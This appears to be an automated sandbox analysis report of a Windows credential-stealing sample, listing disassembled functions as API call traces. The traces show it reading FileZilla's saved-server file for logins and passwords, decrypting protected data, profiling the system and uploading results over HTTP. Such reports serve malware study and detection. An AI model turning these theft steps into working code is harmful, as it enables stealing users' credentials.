String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,042F6940,00000000,?,0041D758,00000000,?,00000000,00000000,?,042F74E0,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,042F3AA8), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,042F6D48), ref: 004072FB
lstrcat.KERNEL32(?,042F6B98), ref: 0040730F
lstrcat.KERNEL32(?,042F8470), ref: 00407322
lstrcat.KERNEL32(?,042F8350), ref: 00407336
lstrcat.KERNEL32(?,042F3B30), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,042F6D48), ref: 00407399
lstrcat.KERNEL32(?,042F6B98), ref: 004073AD
lstrcat.KERNEL32(?,042F8470), ref: 004073C1
lstrcat.KERNEL32(?,042F8350), ref: 004073D4
lstrcat.KERNEL32(?,042F8180), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,042F6D48), ref: 00407438
lstrcat.KERNEL32(?,042F6B98), ref: 0040744B
lstrcat.KERNEL32(?,042F8470), ref: 0040745F
lstrcat.KERNEL32(?,042F8350), ref: 00407473
lstrcat.KERNEL32(?,042F81E8), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,042F6D48), ref: 004074D6
lstrcat.KERNEL32(?,042F6B98), ref: 004074EA
lstrcat.KERNEL32(?,042F8470), ref: 004074FD
lstrcat.KERNEL32(?,042F8350), ref: 00407511
lstrcat.KERNEL32(?,042F8250), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,042F6D48), ref: 00407574
lstrcat.KERNEL32(?,042F6B98), ref: 00407588
lstrcat.KERNEL32(?,042F8470), ref: 0040759C
lstrcat.KERNEL32(?,042F8350), ref: 004075AF
lstrcat.KERNEL32(?,042F82B8), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,042F6D48), ref: 00407613
lstrcat.KERNEL32(?,042F6B98), ref: 00407626
lstrcat.KERNEL32(?,042F8470), ref: 0040763A
lstrcat.KERNEL32(?,042F8350), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(3095D020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,042F0A18), ref: 004077DB
lstrcat.KERNEL32(?,042F7640), ref: 004077EE
lstrlen.KERNEL32(3095D020), ref: 004077FB
lstrlen.KERNEL32(3095D020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 1deb68fe007c3a931c0a137675a9dba7412e12439f4df884cae112fa19bd3d59
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

<Port>, xrefs: 0040EC06
<Pass encoding="base64">, xrefs: 0040EC9A
url: , xrefs: 0040EDB7
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
browser: FileZilla, xrefs: 0040ED99
password: , xrefs: 0040EE3B
profile: null, xrefs: 0040EDA8
<User>, xrefs: 0040EC50
<Host>, xrefs: 0040EBBC
login: , xrefs: 0040EE0A

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 69bd349b282df7ba6b8db11135eb5aaf6ea59cc80ae1b81a19c62369651b1021
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: 69bd349b282df7ba6b8db11135eb5aaf6ea59cc80ae1b81a19c62369651b1021
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,042D2910), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,042D29A0), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,042D2958), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,042D2940), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,042D2970), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,042EEF30), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,042D3F78), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,042D41D8), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,042F0638), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,042F0530), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,042F05F0), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,042F05D8), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,042D3FF8), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,042F03F8), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,042F0428), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,042D4138), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,042F04E8), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,042F0548), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,042D4018), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,042F0398), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,042D4078), ref: 004160F8
LoadLibraryA.KERNEL32(042F0500,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(042F0650,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(042F0518,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(042F04A0,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(042F0608,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,042F04D0), ref: 00416172
GetProcAddress.KERNEL32(75290000,042F05A8), ref: 00416193
GetProcAddress.KERNEL32(75290000,042F0668), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,042F0620), ref: 004161CD
GetProcAddress.KERNEL32(75450000,042D3F98), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,042EEF40), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,042F0A48,?,042F84A0,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,042F0A78,00000000,?,042F7B58,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
HeapAlloc.KERNEL32(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

--, xrefs: 00404F34
------, xrefs: 004051AD
------, xrefs: 00404F4B
------, xrefs: 0040506B
", xrefs: 00405278
", xrefs: 004053BA
", xrefs: 00405136
------, xrefs: 004052EF
J&f, xrefs: 00405029

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 2633831070-3705675087
Opcode ID: 465e31c50ca583c8e17bae36ce337e8ad2033ac8c63f841b0aa9da903d8ddf65
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 465e31c50ca583c8e17bae36ce337e8ad2033ac8c63f841b0aa9da903d8ddf65
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,042F0A68), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,042F0AA8,00000000,?,042F7B58,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,042F0A48,?,042F84A0,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
